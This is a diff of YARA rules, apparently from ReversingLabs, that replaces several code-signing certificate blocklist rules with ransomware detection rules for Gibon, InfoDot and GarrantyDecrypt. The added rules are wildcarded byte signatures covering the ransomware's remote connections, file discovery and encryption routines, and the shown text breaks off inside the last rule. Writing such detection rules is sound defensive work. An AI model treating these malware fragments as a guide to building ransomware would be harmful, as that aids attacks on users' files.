-		logic_hash = "fcbda27f8bf4dca8aa32103bb344380c82f0c701c25766df94c182ef94805a12"
+		logic_hash = "cace0f35529307487f39aace6ae8989c7b878f82ebe890b256dfac563551a099"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Gibon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_server_connection_1_0 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
+            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BA ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ??
+            ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 B9 ?? ?? ?? ?? 83 FE ?? 75 ?? BA ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 43 ??
+            83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? FF 73 ?? 0F 43 43 ?? 8D 8D ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$remote_server_connection_1_1 = {
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 8B 53 ?? 8D 4B ?? 83 FA ?? 0F 43 4B ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 90 8A 01
+            41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 8D 43 ?? 6A ?? 83 FA ?? 51 0F 43 43 ?? 50 56 FF 15
+            ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B C8 E8 ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 8B 43 ?? 83 F8 ?? 72 ?? 8B 4B ?? 40 3D ?? ?? ?? ?? 72
+            ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82
+            ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8B 4D
+            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
+        }
+		$encryption_loop_1_0 = {
+            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ??
+            8B C2 83 C8 ?? 83 79 ?? ?? 0F 45 C2 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 C0 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 C7 45 ?? ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 83 CB ?? 68 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B D7 8B 9D ?? ?? ?? ?? 83 CB ?? 83 7F ?? ?? 89 9D ?? ?? ?? ?? 89
+            9D ?? ?? ?? ?? 72 ?? 8B 17 83 78 ?? ?? 8B C8 72 ?? 8B 08 8B 70 ?? 3B 77 ?? 75 ?? 85
+            F6 0F 84
+        }
+		$encryption_loop_1_1 = {
+            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? EB ??
+            32 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ??
+            8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 32 C0 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 32 C0 C7 45 ?? ?? ?? ?? ?? 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? C6 45 ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95
+        }
+		$encryption_loop_1_2 = {
+            57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 51 FF B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 51
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 69 0F ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 03 48 ?? 8D 85 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 85 C0 74 ?? BA
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encryption_loop_1_3 = {
+            69 37 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 70 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 78 ?? 8D
+            4A ?? 89 08 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ??
+            B9 ?? ?? ?? ?? F3 A5 66 A5 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            C6 45 ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B BD ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? FF 07 8B 07 89 41 ?? 69 17 ?? ?? ?? ?? 8B 41 ?? 80 A4 02
+            ?? ?? ?? ?? ?? 8B 01 48 39 07 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8A 11 8B
+            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\x8E\\xE9\\x9B\\xAA\\xE6\\xA2\\x85" and pe.signatures [ i ] . serial == "3b:c3:ba:e4:11:8d:46:f3:fd:d9:be:ee:ab:74:9f:ee" and 1442275199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $remote_server_connection_1_0 and $remote_server_connection_1_1 and ( all of ( $encryption_loop_1_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0F0449F7691E5B4C8E74E71Cae822179 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Infodot : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects InfoDot ransomware."
 		author = "ReversingLabs"
-		id = "17c99772-f2f9-56bc-be01-d9f62626a9ff"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "2f6447f4-523b-5ea1-a16d-d68bb9bcc79d"
+		date = "2021-02-16"
+		modified = "2021-02-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1708-L1724"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.InfoDot.yara#L1-L115"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f8d3593b357f27240a4399e877ae9044f783bb944ad47ec9fe8bbecc63be864c"
+		logic_hash = "24a1c25c1d70c21323417ae0892c613361c4bfc829737ef86b6fa7616ae668c6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "InfoDot"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 8B D9 89 9D ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 FF D3 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? EB
+            ?? 8D 49 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75
+            ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
+            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
+            C0 74 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 85 D2 74
+            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0
+            83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 50 FF 15
+        }
+		$find_files_p2 = {
+            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 56 50 FF D7 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 FF D3 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? F6 85 ?? ??
+            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 56 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 FF D7 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9
+            EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
+            8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 99 83 C4 ?? 0B
+            C2 75 ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 83 CB ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? 8B CF 8D A4 24
+            ?? ?? ?? ?? 66 8B 31 66 3B 32 75 ?? 66 85 F6 74 ?? 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83
+        }
+		$find_files_p3 = {
+            C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
+            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
+            C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 0F 66 3B 08 75 ?? 66 85 C9 74 ?? 66 8B 4F ?? 66 3B 48
+            ?? 75 ?? 83 C7 ?? 83 C0 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 DB 7F ?? 8B 95 ?? ?? ?? ?? 7C ?? 81
+        }
+		$find_files_p4 = {
+            FA ?? ?? ?? ?? 73 ?? 3B D8 0F 8F ?? ?? ?? ?? 7C ?? 3B D1 73 ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? 8D 95 ?? ?? ?? ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 84 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 3B D8 7F
+            ?? 7C ?? 8B 85 ?? ?? ?? ?? 3B C1 73 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8B F1 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 74 ?? 83 C8 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 56 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 0F 57
+            C0 68 ?? ?? ?? ?? 50 F3 0F 7F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            57 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B FF
+            81 FF ?? ?? ?? ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75
+            ?? 8B C7 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 BE ?? ?? ?? ?? 2B F0 8D 85 ?? ?? ?? ??
+            56 03 C7 56 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F7 8D 85 ?? ??
+            ?? ?? 56 50 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 6A ?? 50 E8 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
+            83 C4 ?? 33 CD 33 C0 5F 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SBO INVEST" and pe.signatures [ i ] . serial == "0f:04:49:f7:69:1e:5b:4c:8e:74:e7:1c:ae:82:21:79" and 1432079999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_43Db4448D870D7Bdc275F36A01Fba36F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Garrantydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GarrantyDecrypt ransomware."
 		author = "ReversingLabs"
-		id = "47b3e681-87ae-5e70-8d02-18aa0daab0dc"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0aa05f06-1773-5ce8-892d-04468f5deccc"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1726-L1742"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GarrantyDecrypt.yara#L1-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "951e35e2c3f1bd90a33f8b76b6ede5686ee9b9c97a4c71df5b9dff15956209c5"
+		logic_hash = "7194c1e0e15a89f2c691a7d586b9db68295cc52a5f042d0f7eb558c326430444"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GarrantyDecrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 8D 45 ?? 50 89 5D ?? FF D6 85 C0 75
